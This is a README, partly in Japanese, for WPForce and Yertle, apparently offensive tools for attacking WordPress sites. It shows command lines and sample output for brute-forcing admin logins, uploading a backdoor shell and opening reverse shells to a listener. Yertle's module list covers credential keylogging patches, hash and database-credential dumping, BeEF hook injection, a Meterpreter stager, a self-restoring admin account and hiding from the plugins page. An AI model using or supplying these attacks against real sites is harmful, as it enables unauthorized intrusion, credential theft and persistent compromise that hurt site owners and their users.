WPForce は、Wordpress 攻撃ツールのスイートです。現在、これには 2 つのスクリプトが含まれています。WPForce は API 経由でブルート フォース ログインを実行し、Yertle は管理者の資格情報が見つかったらシェルをアップロードします。 Yertle には、悪用後のモジュールも多数含まれています。
詳細については、次のブログ投稿を参照してください: https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromized-wordpress-server/
中国語 - www.mottoin.com/100381.html
ポルトガル語 - http://www.100security.com.br/wpforce/
スペイン語 - http://www.1024megas.com/2017/05/wpforce-fuerzabruta-postexplotacion.html
ロシア語 - https://hackware.ru/?p=2547
フランス語 - https://securityhack3r.info/wpforce-brute-force- Attack-tool-wordpress/
トルコ語 - http://turkhackteam.org/web-server-guvenligi/1655005-wordpress-site-sizma-testi-part-1-a.html
Yertle requires the requests libary to run.
python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"
,-~~-.___. __ __ ____ _____
/ | x / /| _ | ___|___ _ __ ___ ___
( ) 0 / / / | |_) || |_ / _ | '__|/ __|/ _ .
_/-, ,----' ____ V V / | __/ | _|| (_) || | | (__| __/
==== || _ _/_/ |_| |_| ___/ |_| ___|___|
/ -'~; || |
/ __/~| ...||__/|-" Brute Force Attack Tool for Wordpress
=( _____||________| ~n00py~
Username List: usr.txt (3)
Password List: pass.txt (21)
URL: http://www[website].com
[[email protected] : xxxxxxxxxxxxx] are valid credentials! - THIS ACCOUNT IS ADMIN
[[email protected] : xxxxxxxxxxxx] are valid credentials!
100% Percent Complete
All correct pairs:
{'[email protected]': 'xxxxxxxxxxxxx', '[email protected]': 'xxxxxxxxxxxxx'}
-h, --help show this help message and exit
-i INPUT, --input INPUT
Input file name
-w WORDLIST, --wordlist WORDLIST
Wordlist file name
-u URL, --url URL URL of target
-v, --verbose Verbose output. Show the attemps as they happen.
-t THREADS, --threads THREADS
Determines the number of threads to be used, default
is 10
-a AGENT, --agent AGENT
Determines the user-agent
-d, --debug This option is used for determining issues with the
python yertle.py -u "[username]" -p "[password]" -t "http://www.[website].com" -i
_..---.--. __ __ _ _
.' __|/O.__) / /__ _ __| |_| | ___
/__.' _/ .-'_ V / _ '__| __| |/ _ .
(____.'.-_____) | | __/ | | |_| | __/
(_/ _)__(_ _)_ |_|___|_| __|_|___|
(_..)--(.._)'--' ~n00py~
Post-exploitation Module for Wordpress
Backdoor uploaded!
Upload Directory: ebwhbas
-h, --help show this help message and exit
-i, --interactive Interactive command shell
-r, --reverse Reverse Shell
-t TARGET, --target TARGET
URL of target
-u USERNAME, --username USERNAME
Admin username
-p PASSWORD, --password PASSWORD
Admin password
-li IP, --ip IP Listener IP
-lp PORT, --port PORT
Listener Port
-v, --verbose Verbose output.
-e EXISTING, --existing EXISTING
Skips uploading a shell, and connects to existing
Yertle には現在次のモジュールが含まれています。
Core Commands
Command Description
------- -----------
? Help menu
beef Injects a BeEF hook into website
dbcreds Prints the database credentials
exit Terminate the session
hashdump Dumps all WordPress password hashes
help Help menu
keylogger Patches WordPress core to log plaintext credentials
keylog Displays keylog file
meterpreter Executes a PHP meterpreter stager to connect to metasploit
persist Creates an admin account that will re-add itself
quit Terminate the session
shell Sends a TCP reverse shell to a netcat listener
stealth Hides Yertle from the plugins page